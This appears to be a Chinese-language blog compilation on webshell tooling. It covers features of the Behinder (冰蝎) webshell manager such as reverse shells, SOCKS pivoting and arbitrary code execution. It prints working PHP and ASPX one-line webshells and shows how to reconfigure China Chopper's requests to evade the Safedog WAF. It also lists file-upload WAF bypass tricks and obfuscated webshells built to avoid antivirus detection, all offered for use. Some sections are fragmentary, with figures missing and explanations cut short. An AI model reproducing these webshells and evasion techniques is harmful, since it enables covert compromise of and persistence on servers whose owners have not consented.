rebeyond大大出的神器冰蝎下载地址

作为新型加密网站管理客户端，冰蝎算是作为中国菜刀的替代者。我们来看下他的主要功能。

主要功能

1. 基本信息

客户端和服务端握手之后，会获取服务器的基本信息，Java、.NET版本包括环境变量、系统属性等，PHP版本会显示phpinfo的内容。

2. 文件管理

这个没什么好说的，无非是文件的增删改查，稍微不同的是上传的文件都是加密传输的，可以避免被拦截。

3. 命令执行

执行单条操作系统命令。

4. 虚拟终端

虚拟终端是模拟了一个真实的交互式Shell环境，相当于把服务器侧的Shell给搬到了客户端，在这个Shell里可以执行各种需要交互式的命令，如ssh、mysql。比如说：我们可以在这个Shell里去ssh连接服务器侧内网的其他主机，可以参考下面这个动图：

当然，如果你习惯powershell，也可以弹个powershell出来，如下图：

5. Socks代理

虚拟终端功能其实就已经部分实现了内网穿透的能力，在Shell环境里做的所有事情都是在内网环境中的。不过为了方便使用其他工具，客户端还提供了基于一句话木马的Socks代理功能，一键开启，简单高效，可以参考如下动图：

顺便说一下，代理过程中所有的流量都是在socks的基础上封装了一层AES。

6.反弹Shell

反弹Shell是突破防火墙的利器，也几乎是后渗透过程的必备步骤。提到后渗透，当然少不了metasploit，提到metasploit，当然少不了meterpreter，所以冰蝎客户端提供了两种反弹Shell的方式，常规Shell和Meterpreter，实现和metasploit的一键无缝对接。请参考如下动图：

上图演示的是Meterpreter，当然常规的Shell也可以对接metasploit，就不演示了。

7.数据库管理

常规功能，实现了数据库的可视化管理，放张截图吧：

和常规管理工具不同的是，在Java和.NET环境中，当目标机器中没有对应数据库的驱动时，会自动上传并加载数据库驱动。比如目标程序用的是MySQL的数据，但是内网有另外一台Oracle，此时就会自动上传并加载Oracle对应的驱动。

8.自定义代码

可以在服务端执行任意的Java、PHP、C#代码，这也是个常规功能，值得一提的是我们输入的代码都是加密传输的，所以不用为了躲避waf而用各种编码变形，效果请参考如下动图：

9.备忘录

渗透的时候总有很多零碎的信息需要记录，所以针对每个Shell提供了一个备忘录的功能，目前只支持纯文本，粘贴进去自动保存：

接下来我们看下他的亮点出在哪里

看下他的php一句话

<?php session_start();isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&$b[0]($b[1]);?>

为了代码可读性，我们来扩充下：

<?php
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $decrptContent=openssl_decrypt(file_get_contents("php://input"), "AES128", $key);
    $arr=explode('|',$decrptContent);
    $func=$arr[0];
    $params=$arr[1];
    $func($params);
}
?>

介绍下流程

• 首先get发起带密码的请求，服务端随机产生密钥存入session。

• 获取session中的密钥，然后将客户端发送的源代码进行aes加密，通过|分割，然后通过php的可变函数执行。

具体一点，比如我们客户端有一段代码

assert|eval("phpinfo();")

进行aes128加密发送给服务端，服务端用explode函数分割字符，索引为0的是assert，索引为1的是eval("phpinfo();")，然后通过可变函数执行assert("eval(\"phpinfo();\")")，这样就很清晰明了了。

过waf的效果

常规一句话<?php @eval($_POST['caidao']);?>菜刀链接：

新型一句话冰蝎链接：

对菜刀的修改

对这个一句话颇感兴趣，那么我们是不是可以把菜刀也改一改呢？

我本地搭建了环境，一句话内容为<?php @eval($_POST['caidao']);?>

先来抓包看下菜刀的请求包

在新版菜刀2016的caidao.conf中45行，%s是执行的命令

ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&id=%s

解密后

eval(base64_decode($_POST[id]));&id=%s

那么我们的一句话可以这样写

<?php
if ($_GET['pass']!=1){
}
else{
    $decrpt = file_get_contents("php://input");
    $arrs = explode("|", $decrpt)[1];
    $arrs = explode("|", base64_decode($arrs));
    call_user_func($arrs[0],$arrs[1]);
}
​
?>

你也可以这样来

<?php
$decrpt = $_POST['x'];
$arrs = explode("|", $decrpt)[1];
$arrs = explode("|", base64_decode($arrs));
var_dump($arrs[0],$arrs[1]);
call_user_func($arrs[0],$arrs[1]);
?>

那么我们菜刀要改下

|assert|eval(base64_decode($_POST[id]));|&id=%s

在caidao.conf的45行就要改成

|YXNzZXJ0fGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbaWRdKSk7|&id=%s

这样和冰蝎实现的效果就一样了，同样过狗，愉快玩耍吧！

涉及到的资料，表示感谢！

https://www.t00ls.net/thread-48079-1-1.html

https://xz.aliyun.com/t/2774

原理未知

安全狗竟然查杀不了这么 nb 的 code

<%@ Page Language="Jscript"%>
<%eval(/*s*/ Request.Item["pass"],"unsafe");%>

原创文章，转载请标明出处！

0x00 介绍

鲁迅说:偷窃一个的是创意剽窃，偷窃很多人的创意是研究。

本文是个人学习的一个小总结，很多思路都是学习网上大佬的，可能本文中的某个思路或许已经被公布，但是我阅历比较少，并不知道，如果有重复的，可以提出来，我会文章后面贴上地址。

0x01 上传绕过

说到突破狗绕过，公布的姿势太多了，常规的后缀大小写修改、截断上传、不规则文件名截断、删除Conten-Type、垃圾数据填充等。我简单的总结下。

环境

Windows版某狗ApacheV3.5+phpstudy

说道这里，可能有人会吐槽你这是V3.5的不是还有个V4.0的嘛，什么文章啊垃圾。关于版本问题我以前写过一篇水文，绕的是V4.0加服务器安全狗，不多说直接上图。

其实版本是有差异但是方法都是一样的。

绕过

Burp抓包 原本数据包

------WebKitFormBoundaryl2Fe3Re3WQjeJFBi
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream

思路：改变大小写+垃圾数据填充+删除
主要从这里入手
Content-Disposition: form-data; name="file"; filename="1.php"

Content-Disposition:大写C改为小写c

form-data;前面加zz

form-data;把f去掉
上面三个例子只是简单的一个小例子，我想给大家说的其实是，我们可以下面的数据为所欲为
Content-Disposition: form-data; name="file"; filename="1.php"
比如随便删除，修改，回车，增添，倒转都可以，然后你会发现绕狗上传是如此简单。
下面介绍几个有趣点的:
filename="4.php"改成filename=4.php filename""

倒转把Content-Type: application/octet-stream提到上面来

把name="file"提到前面来
Content-Disposition: name="file"; form-data; filename="6.php"
回车:

还有 " ' ;

filename=""xx.php"  //加个双引号
filename=";xx.php"  //加个分号
filename="'xx.php"  //加个单引号

就到这里告一段落了，关于狗的版本差异问题没多大，上面的方法试试，然后就可以找到了，大家可以多动手，发挥脑洞，这类方法也可以在其他WAF试试，给大家提供些思路协议未覆盖，Fuzz模糊测试突破文件上传。

0x02 免杀一句话

这里我详细讲解一个过狗过D盾的php一句话的编写。在Tool论坛分享过

• 先来看看我们常见的PHP一句话长啥样

“
首先我们需要了解两个PHP函数 call_user_func()和array_map()

• call_user_func()

function uu($x,$y){     //定义了一个uu的函数 参数为变量 $x,$y
        return $x.$y;      //返回值为 是将$x和$y拼接
}
echo @call_user_func('uu',Too,ls);  //将"Too,ls"分别传给 $x , $y ,组成Tools，  echo输出Tools @是防止报错

运行结果

大家知道 assert是PHP一句话中常见的执行函数

function uu($x,$y){
        return $x.$y;
}
echo @call_user_func('uu',ass,ert);

如果我们这样写是不是就组成了assert, 满足文章开头常见一句话的特征咯。

• array_map()

看个小例子i

效果: 大家只要记住 $arr可以是个数组

如果我们这样写，也算个数组了，看到这里很多小伙伴灵机一动
$i = array($_POST[x]);

• 编写一句话

把上述的列子结合起来就可以了

去掉注释比较方便。

是免杀的，过狗的可以的

• 总结

主要是用各种方法拼接组合相关执行函数，然后运用回调函数的方法来执行。免杀可能是一时的，但是思路是活的，大家可以去学学php基础，也可以轻易写出免杀的一句话。

0x03 免杀大马

思路来源

• 首先需要一份大马源码

• 思路

// base64_decode函数的作用是对base64编码过的数据进行解码

• 免杀

有人说这只是静态免杀，大马操作时候还会拦截，然而并不会。
我在大马上执行命令还是不会拦截。

总结

我们是站在前人的肩膀上成长起来的。

代码

array_map()

array_map() 函数将用户自定义函数作用到数组中的每个值上, 并返回用户自定义函数作用后的带有新值的数组

初始代码

array_map($_GET['1'],$$a);
D盾 一级

但 D盾 不拦截赋值语句

array_map($b=$_GET['1'],$c=$a);

绕过

加上 @ 关闭错误回显